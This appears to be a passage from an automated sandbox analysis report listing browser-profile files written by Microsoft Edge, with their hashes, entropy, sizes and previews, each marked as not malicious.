                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7603868354494112
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkKR:eIEumQv8m1ccnvS6/
                                                                                                                                                                                                                                                                                  MD5:5C02F1ABC48C0E9C68FF4BEF8EE1B343
                                                                                                                                                                                                                                                                                  SHA1:02FC6E8FEDF00793679517C50E8B8680C4BD970D
                                                                                                                                                                                                                                                                                  SHA-256:01EAD8717C2867F01A93D8920BF7415DF648C85A8C47095D9690AC4E573C28BE
                                                                                                                                                                                                                                                                                  SHA-512:4BCD0188E41AA3D1552FB54046A2A14227072A2289F09F024C30B0D48406C12F9F50E69B99788317AF71CD49F78FC08EB668C0FDDA3D0C6D417C56FDBF250FB5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                  MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                  SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                  SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                  SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7766998781393047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtiuWkKcwF11DM/FAf4ADfzO7L0rqqV1K:LLiuW9LFPY/Wf4ADLo0rqq2
                                                                                                                                                                                                                                                                                  MD5:F78DE6EABD094AFC0DC1CD98BF1042DC
                                                                                                                                                                                                                                                                                  SHA1:87336EA8606603FFC464C5FE23F2733EECAF4C35
                                                                                                                                                                                                                                                                                  SHA-256:D167071B19C4020D84F550A61A00E4F4C3510872DCD3642A260B489DAE3077AF
                                                                                                                                                                                                                                                                                  SHA-512:71892608267440271502151EDB50F9054F69288ABE1C74097737C6E3AC0750F28D668867B4C6560CEF300A86AE3FBDBA46FEB87E40A21978DD13B45D3FAE434E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:sVCSzn5J1a8b9FDcJJY/3+d85Th6Cp9/x+6M8muecmAeCmpe4zvrJ2kHQyV0E5Ak:sVCSFJzGJY/3g8Ppj+FVAEJj1f
                                                                                                                                                                                                                                                                                  MD5:F7A4CB09E751C55D5987C38A6B4374B7
                                                                                                                                                                                                                                                                                  SHA1:DF9245993E6D13EA559A3D426EEC35104FC26504
                                                                                                                                                                                                                                                                                  SHA-256:56EA9CAEA9822FEB7F060B3AE7583EDCA561802C5DE39EA8210888200CB10A98
                                                                                                                                                                                                                                                                                  SHA-512:71CF9F21ED9C32063DDC82BA7330D7BC7412C2F5ABD87DBA8C859026029DCE364B1672308C2CDE311C65A36DD82CD062C9EFC5FB0B32D2F778C23D18AABF6276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.627204731507878
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljljljljl:S85aEFljljljljljljljljljljljl
                                                                                                                                                                                                                                                                                  MD5:70EF71DD0FED6C14B2B6E149267A2C2A
                                                                                                                                                                                                                                                                                  SHA1:B8829EA9631CD5E0ABA87D81E71047EF5FA92F24
                                                                                                                                                                                                                                                                                  SHA-256:3530055A62DDC24A89DD97751AC9DB187D009EB8193A29A3636CAE2567D4A4CD
                                                                                                                                                                                                                                                                                  SHA-512:2ED43127BCD5443C4CD04A01F70DE06C50FCEF1F284EE4DFEC07E605133AA5CD6A1E197DBC0C6E73679AF491B976A7304E8D38D58C948CB55471399978470241
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.168168774095214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73TmDSSN+q2Pwkn23oH+TcwtrQMxIFUt8O3TGmZmw+O3TaVkwOwkn23oH+Tcwtrb:73T0Si+vYfYebCFUt8O3TGm/+O3TaV5J
                                                                                                                                                                                                                                                                                  MD5:AFEDC31C2C267EB37BF7FC7C85BA631F
                                                                                                                                                                                                                                                                                  SHA1:60029C2EB657EBB71213BFC23F99D8F16FB4545B
                                                                                                                                                                                                                                                                                  SHA-256:5446654B135D46B06BD71BB2E799DD9BE8D1077F975649A3B44BDCF6CFB2EA37
                                                                                                                                                                                                                                                                                  SHA-512:935775B5449E2B9BA7138CC769248D31864BBB20E04312EA847C1E612625DD364EE0FE9A2954302CEF8BDD28DB8E042311B28EDD8CEDCF3DFCB5485A4892C6EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.688 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:41:29.689 1f7c Recovering log #3.2024/12/10-12:41:29.697 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2285
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.466144174246087
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:3ARYbcARQOpKo+O5yo+OUjs40s4ARd9U:3AR3ULZVSs40s4Ud9
                                                                                                                                                                                                                                                                                  MD5:9F3D4BBB3C2CFB5B62FDE04A4F8F7A1B
                                                                                                                                                                                                                                                                                  SHA1:B8E018E4E551641906FB51ED95DB6B32002A306A
                                                                                                                                                                                                                                                                                  SHA-256:69296E15F13B8CA42A23A2EF1F47B1C9A2CD6AA7A82B5775F0C3A451C90251BD
                                                                                                                                                                                                                                                                                  SHA-512:9957A249FC487F553FFEEEA4AC2176C4987D25ABCE4661CA031A9B8C6D6A488ED8CC4EBA93D408093E82956E518D9B62E8DD27B1EE0D797E3C6F1FFF15493706
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SNSS.......?..............?........."?..............?..........?..........@..........@.......!..@..................................?...@...1..,...@...$...4ddc2bc5_c4b2_4d11_a358_c21a3d91bd85...?..........@.......aq{........?......?.......................5..0...?...&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.....?.............A..........A.......!..A..................................?...A...1..,...A...$...52d26e06_6802_4864_9f6d_9e59dfd60e53...?..........A.......-.L........A..............A.......8...file:///C:/Users/user/AppData/Local/Temp/1027599800.pdf............!........................................................................................................n...(...n...(..@.......X.......................................................................x...8...f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.0.2.7.5.9.9.8.0.0...p.d.f.................................8.......0.......8.............................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.123510798665569
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7iBt+q2Pwkn23oH+Tcwt7Uh2ghZIFUt8OiJE5Zmw+OiJEtVkwOwkn23oH+Tcwt7w:7BvYfYebIhHh2FUt8OWQ/+OWY5JfYebs
                                                                                                                                                                                                                                                                                  MD5:A370ED615801429C6A34951531E37679
                                                                                                                                                                                                                                                                                  SHA1:928FDA1AE6BD54DA35C0C14587C7D5C7E8E6BEF8
                                                                                                                                                                                                                                                                                  SHA-256:05731D88BBDF9241EDFF33AE2EC19AB1D810208A2EF52F21E549E8C6A110A606
                                                                                                                                                                                                                                                                                  SHA-512:2A3723FABE824545BB168FC5BC83A65551953F1D82C714CD6844FF44FF52FD13A0E2E051FAC22F6EB6CAB8F0CC7CE5A75B0CC341B4EDDDB34C9E44C2FE1A4B40
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1ea8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:41:28.699 1ea8 Recovering log #3.2024/12/10-12:41:28.699 1ea8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
